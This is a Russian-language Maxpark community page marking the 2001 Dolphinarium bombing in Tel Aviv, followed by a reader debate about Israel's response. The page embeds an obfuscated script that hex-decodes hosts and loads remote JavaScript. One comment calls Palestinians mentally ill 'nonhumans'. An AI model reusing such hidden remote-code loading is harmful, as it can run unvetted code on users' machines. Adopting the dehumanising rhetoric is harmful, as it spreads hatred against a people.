Войти в аккаунт
Хотите наслаждаться полной версией, а также получить неограниченный доступ ко всем материалам?

Shalom

Сообщество 1408 участников
Заявка на добавление в друзья

Ровно десять лет тому назад......теракт в "Дельфинариуме", в Тель - Авиве

Это видео посвящается одному из самых тяжелых терактов в истории Израиля-в дискотеке "Дельфинариум" 
в Тель - Авиве,в память о наших погибших детей
Ровно пятнадцать лет тому назад, 1 июня 2001 года, в 23 часа 45 минут террорист-смертник, активист арабской террористической группировкой «Исламский джихад», житель Калькилии Саид Хутори, взорвался в толпе подростков, которые стояли у входа в популярную тель-авивскую дискотеку «Дольфи». В результате погибли 21 человек -- в большинстве своем русскоязычные подростки, ученики школы «Шевах Мофет». 120 человек получили ранения.
«Исламский джихад» тут же взял на себя ответственность за теракт. Хутори был провозглашен шахидом -- мучеником за веру. На улицах арабских городов прошли спонтанные манифестации, участники которых стреляли в воздух и раздавали сладости, радуясь гибели еврейских -израильских детей

 
<form id="u_jsonp_3_u" class="commentable_item" action="https://www.facebook.com/ajax/ufi/modify.php" method="post" data-ft="{">
"По всей стране хамсин..."
Музыка и исполнение Злата Раздолина
Стихи Александр Крестинский
Текст на иврите Ора Ронен
Запись с авторского вечера композитора Златы Раздолиной-
концерта солидарности с семьями пострадавших от теракта в "Дельфинариуме", в Тель - Авиве

</form>

<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>

{{ rating.votes_against }} {{ rating.rating }} {{ rating.votes_for }}

Комментировать

осталось 1800 символов
Свернуть комментарии

Все комментарии (25)

Бегемот Чеширский

комментирует материал 01.06.2016 #

15 лет.
Никто не понёс наказания
никто не был привлечён к ответственности.

no avatar
spros nl

отвечает Бегемот Чеширский на комментарий 01.06.2016 #

просто нашли и убили

no avatar
Бегемот Чеширский

отвечает spros nl на комментарий 02.06.2016 #

да неужели?абушмазен ещё жив,живы и насрала с нарыгало,живы хания и иже с ними..пластилинское государство признано всем миром в отличии от еврейского.Никто не понёс наказания.

no avatar
Boris Margulis

отвечает Бегемот Чеширский на комментарий 02.06.2016 #

Вы всех арабов пофамильно перечислить не хотите? Начало уже положили... Речь идет о тех. кто непосредственно в этом участие принимал... Абу Мазена среди них не было..Впрочем как и Насралы...

no avatar
Бегемот Чеширский

отвечает Boris Margulis на комментарий 02.06.2016 #

неужели не было????Вы можете это доказать?)))

no avatar
Boris Margulis

отвечает Бегемот Чеширский на комментарий 03.06.2016 #

Доказывать надо вам.. Вы же эту тему подняли..Вот и покажите мне ссылки подтверждающие ваши слова...

no avatar
Boris Margulis

отвечает Бегемот Чеширский на комментарий 03.06.2016 #

. В нашем сообществе запрещено обговаривать и обсуждать членов сообщества..и тем более оскорблять их.. Это только за то что я про Шарона гадости не говорю... ? На будущее вам совет.. В следующий раз обвиняя кого либо,.приводите факты...
Еще один подобный комментарий и из сообщества вы будете удалены...

no avatar
игорь мазо

отвечает Бегемот Чеширский на комментарий 03.06.2016 #

Бегемот! СТОП,перешел на обсуждение оппонента,давай не будем уподобляться ватникам .Доказывай,высказывай.но помни -ты среди своих,и проявляй элементарное уважение к другой точке зрения.

no avatar
Бегемот Чеширский

отвечает игорь мазо на комментарий 03.06.2016 #

не ставил перед собой цели нанести оскорблений участникам,айм сори,слихуйте!Выражение про розовые очки очень распространённое выражение.Не затрагивает в обсуждении каких либо физических недостатков собеседника.Применительно ко всем кто заблуждается в своих выводах по существу..

no avatar
Boris Margulis

отвечает Бегемот Чеширский на комментарий 03.06.2016 #

Можете считать меня мнительным самодуром...Мне все равно... Но тот комментарий я хочу чтобы вы убрали....Еще один Ленин нашелся....Не уберете вы.. Это сделаю я...

no avatar
misha_52 nl

комментирует материал 01.06.2016 #

Да это ужасно. Но силой нас сюда никто не тащил. А своя страна имеет свою цену и часто жестокую. Пусть не сотрется память об этих ребятах. Их смерть не пройдет даром.Их смерть доказывает, что страна должна уметь себя защищать.
Мои самые искренние соболезнования родным и близким.

no avatar
spros nl

комментирует материал 01.06.2016 #

в голове не укладывается до сих пор.. 15 лет, неужели уже 15 лет.. Слёзы. Светлая память

no avatar
Alex Bot

комментирует материал 02.06.2016 #

После теракта мне стали очевидны 2 вещи:
1. Шарон не хочет или уже не может бороться с террором. Он ничего не предпринял против террористов, хотя весь мир был уверен в неизбежности контртеррористической операции Израиля и фактически с ней согласился.

2. Арабы-"палестинцы" - ментально больные люди. Искренне радоваться убийству детей могут только нелюди. Других подобных примеров в мировой истории нет. Зверств хватало - но вот подобных "именин сердца" не было нигде и никогда.

Последующие события только подтвердили мою правоту.

no avatar
Boris Margulis

отвечает Alex Bot на комментарий 02.06.2016 #

Шарон фактически и поборол интифаду... У него было много ошибок.. Но для страны он сделал невероятно много..И с террористами он боролся..дай бог каждому... А сидя у монитора ругать ..проклинать... легче простого...

no avatar
Alex Bot

отвечает Boris Margulis на комментарий 03.06.2016 #

Шарон фактически и поборол интифаду
======
Шарон начал операцию "Защитная стена" с огромным запозданием (это не только мое мнение - это мнение многих военных) только когда "ипукать" более было уже невозможно - после теракта в гостинице "Парк" . Операция не была доведена до конца - в Газу она не дошла под надуманным предлогом.

no avatar
Boris Margulis

отвечает Alex Bot на комментарий 03.06.2016 #

Думаете что другие бы поступили иначе?... Израиль вынужден на международное давление реагировать...Шарон для Израиля очень много сделал... Единственная серьезная его ошибка..Это Газа.. Но тогда очень многие поддерживали его... Про мнение военных я ничего не слышал.. А критиковать всегда легче чем действовать..

no avatar
Alex Bot

отвечает Boris Margulis на комментарий 03.06.2016 #

Какое давление? Никакого давления не было. Весь мир понимал, что в ответ на зверское убийство детей Израиль имеет полное право ответить. И никто не понял, почему реакции не последовало. Дошло до того что знакомые коренные израильтяне обьяснили это тем что погибли "русские" дети. Мол, если бы это были сабры, вот тогда бы Шарон...

no avatar
Boris Margulis

отвечает Alex Bot на комментарий 03.06.2016 #

Давление не было? было..Да еще какое.. Я помню какой вой поднялся в мире когда наши вошли на западный берег.. А конференция ООН в ЮАР?

no avatar
Alex Bot

отвечает Boris Margulis на комментарий 03.06.2016 #

Вы путаете разные вещи. Вой поднялся после начала операции "Защитная стена" - почти через год после Дельфинариума. А как же? Все уже привыкли что Израиль на террор не отвечает а только утирается. И вдруг такое! Ну подумаешь, убили с десяток-другой пенсионеров! Детей же можно было, так почему вдруг нельзя стариков?

Шарон (как ранее Рабин) убедил всех - и врагов прежде всего - что террор не наказывается и более того - поощряется. И в этом его главная вина.

no avatar
spros nl

отвечает Alex Bot на комментарий 12.06.2016 #

а кто виноват в теракте в Т.А ? Не тот ли, кто заигрывая с арабами, смягчил контрольно -пропускной режим в честь Рамадана ? Весь такой не левый, не левый мин.обороны

no avatar
×
Заявите о себе всем пользователям Макспарка!

Заказав эту услугу, Вас смогут все увидеть в блоке "Макспаркеры рекомендуют" - тем самым Вы быстро найдете новых друзей, единомышленников, читателей, партнеров.

Оплата данного размещения производится при помощи Ставок. Каждая купленная ставка позволяет на 1 час разместить рекламу в специальном блоке в правой колонке. В блок попадают три объявления с наибольшим количеством неизрасходованных ставок. По истечении периода в 1 час показа объявления, у него списывается 1 ставка.

Сейчас для мгновенного попадания в этот блок нужно купить 1 ставку.

Цена 10.00 MP
Цена 40.00 MP
Цена 70.00 MP
Цена 120.00 MP
Оплата

К оплате 10.00 MP. У вас на счете 0 MP. Пополнить счет

Войти как пользователь
email
{{ err }}
Password
{{ err }}
captcha
{{ err }}
Обычная pегистрация

Зарегистрированы в Newsland или Maxpark? Войти

email
{{ errors.email_error }}
password
{{ errors.password_error }}
password
{{ errors.confirm_password_error }}
{{ errors.first_name_error }}
{{ errors.last_name_error }}
{{ errors.sex_error }}
{{ errors.birth_date_error }}
{{ errors.agree_to_terms_error }}
Восстановление пароля
email
{{ errors.email }}
Восстановление пароля
Выбор аккаунта

Указанные регистрационные данные повторяются на сайтах Newsland.com и Maxpark.com

Перейти на мобильную версию newsland